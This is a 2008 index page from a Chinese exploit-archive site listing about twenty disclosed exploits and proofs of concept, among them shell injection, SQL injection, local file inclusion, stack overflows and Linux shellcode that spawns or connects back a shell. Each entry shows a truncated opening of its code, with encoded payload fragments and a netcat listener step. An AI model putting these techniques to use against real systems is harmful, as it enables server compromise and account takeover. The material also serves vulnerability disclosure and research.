首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Quicksilver Forums <= 1.4.2 RCE Exploit (windows only)
  日期:2008-11-25 10:58:11 点击:99 评论:0
# Author:__GiReX__ # Homepage:girex.altervista.org # Date:24/11/2008 # CMS:Quicksilver Forums = 1.4.2 # Site:http://www.quicksilverforums.com/ # Bug:Local File Inclusion # Exploit:Remote Command Execution # Note:Works with windows servers only Works
W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC
  日期:2008-11-25 10:57:20 点击:46 评论:0
# W3C Amaya 10.1 Web Browser # # Amaya (id) Remote Stack Overflow Vulnerability # # Written and discovered by: # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) # # Advisory: http://www.bmgsec.com.au/advisory/41/ # --------------------------------
VideoScript 3.0 <= 4.1.5.55 Unofficial Shell Injection Exploit
  日期:2008-11-25 10:54:33 点击:5727 评论:1
?php #=============================================# #= [x] VideoScript 3.0 = 4.1.5.55 Unofficial Shell Injection Exploit =# #= [x] by G4N0K =# #=============================================# error_reporting(E_ALL); $G4N0K =JEc0TjBLID0gPDw8RU9HDQo8Ym
VideoScript 3.0 <= 4.0.1.50 Official Shell Injection Exploit
  日期:2008-11-25 10:50:05 点击:7746 评论:0
?php #===========================================# #= [x] VideoScript 3.0 = 4.0.1.50 Official Shell Injection Exploit =# #= [x] by G4N0K =# #===========================================# error_reporting(E_ALL); $G4N0K =JEc0TjBLID0gPDw8RU9HDQo8Ym9keSBi
W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC
  日期:2008-11-25 10:48:41 点击:48 评论:0
# W3C Amaya 10.1 Web Browser # # Amaya (URL Bar) Remote Stack Overflow Vulnerability # # Written and discovered by: # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) # # Advisory: http://www.bmgsec.com.au/advisory/40/ # ---------------------------
Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
  日期:2008-11-25 10:46:44 点击:69 评论:0
#!/usr/bin/perl -w # # Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC # # Summary: Nero ShowTime provides you with a high-performance software DVD player # that takes you to a new dimension in DVD's. Its cinema-like sound and ex
KVIrc 3.4.2 Shiny (uri handler) Remote Command Execution Exploit
  日期:2008-11-24 13:27:33 点击:35 评论:0
!-- KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit by Nine:Situations:Group::strawdog Tested against IE8beta/WINxpsp3 software site: http://www.kvirc.net/?lang=en description: KVIrc is a Multilanguage, graphical IRC-Client for Windo
linux/x86 append rsa key to /root/.ssh/authorized_keys2 295 bytes
  日期:2008-11-24 13:25:47 点击:154 评论:0
/* linux/x86 shellcode to append rsa key to /root/.ssh/authorized_keys2 keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ ssh -i id_rsa_pwn root@pwned-host 295 bytes by XenoMuta _ __ __ ___ __ | |/ /__ ____ ____ / |/ /_ __/ /_____ _ | / _
linux/x86 connect-back port UDP/54321 live packet capture 151 bytes
  日期:2008-11-24 13:24:47 点击:99 评论:0
/* linux/x86 connect-back port UDP/54321 dup2 fork() execve() /usr/bin/tcpdump -iany -w- port ! 54321 151 bytes by XenoMuta _ __ __ ___ __ | |/ /__ ____ ____ / |/ /_ __/ /_____ _ | / _ / __ / __ / /|_/ / / / / __/ __ `/ / / __/ / / / /_/ / / / / /
linux/x86 execve(/bin/sh,0,0) shellcode 24 bytes
  日期:2008-11-24 13:23:52 点击:38 评论:0
/* History: + v1.0 (27 bytes) = http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/ + v2.0/2.1 (26 bytes) = (http://vlan7.blogspot.com/) (2.1) http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.htm
LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit
  日期:2008-11-24 13:22:51 点击:51 评论:0
?php /** * LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit * Vulnerability found exploited by cOndemned * * Download: *http://www.thethinkingman.net/modules/download_manager/?id=4 * * Description: *This exploit changes forum adm
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 25 bytes
  日期:2008-11-24 13:22:08 点击:60 评论:0
SMALLEST SETUID EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT SPAWNS A SHELL History: + v1.0 (27 bytes) = http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/ + v2.0 (26 bytes) = (http://vlan7.blogspot.com/) htt
Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069
  日期:2008-11-24 12:10:00 点击:42 评论:0
html body KB955218 - CVE-2008-4029 - JA script type=text/javascript var dom = new ActiveXObject(Msxml2.DOMDocument.3.0); dom.async = false; var url = http://www.milw0rm.com/forfun.dtd; var xml = !DOCTYPE pwn SYSTEM ' + url + '; if (dom.loadXML(xml) =
Discuz! Reset User Password Vulnerability
  日期:2008-11-21 10:17:50 点击:89 评论:0
Discuz! Reset User Password Vulnerabilityauthor: 80vul-A/80vul-Bteam:http://www.80vul.com由于Discuz! 的随机数使用的播种缺陷,在找会用户密码时可以暴力得到id的随机hash,从而导致容易修改用户密码的严重漏洞.一 分析暂缺[将在pstzine3上详细介绍这个问题,有兴趣
Oracle Database Vault ptrace(2) Privilege Escalation Exploit
  日期:2008-11-21 10:16:32 点击:86 评论:0
/* * original release: http://vnull.pcnet.com.pl/blog/?p=92 * * ora_dv_mem_off.c version 0x1 * ORACLE Database Vault runtime disabler (x86_32 Linux only) * AKA give_back_the_freedom * by Jakub 'vnull' Wartak jakub.wartak@gmail.com 26.02.2008 * 0-day
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
  日期:2008-11-21 10:15:26 点击:148 评论:0
/* ----------------------------- * Author = Mx * Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm * Software = vBulletin * Addon = Visitor Messages * Version = 3.7.3 * Attack = XSS/XSRF - Description = A critical vulnerability exists in the n
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
  日期:2008-11-21 10:14:42 点击:85 评论:0
?php /*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit requires magic_quotes == off coded by irk4z[at]yahoo.pl homepage: http://irk4z.wordpress.com greets: all
wPortfolio <= 0.3 Admin Password Changing Exploit
  日期:2008-11-21 10:13:27 点击:95 评论:0
?php /* ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_| ========
PunBB Mod PunPortal 0.1 Local File Inclusion Exploit
  日期:2008-11-21 10:12:57 点击:72 评论:0
#!/usr/bin/perl =about PunBB (PunPortal 0.1) Local File Inclusion Exploit -------------------------------------------------- by athos - staker[at]hotmail[dot]it download mod http://www.punres.org/download.php?id=1108 download cms http://punbb.org reg
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
  日期:2008-11-21 10:11:52 点击:46 评论:0
!-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the -l argument to overwrite a file inside Microsoft Help and Support Center folders (oh rgod...) Firstly run netcat in listen mode to drop the vbscript shell
共637页/12733条记录 首页 上一页 [498] [499] [500] 501 [502] [503] [504] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved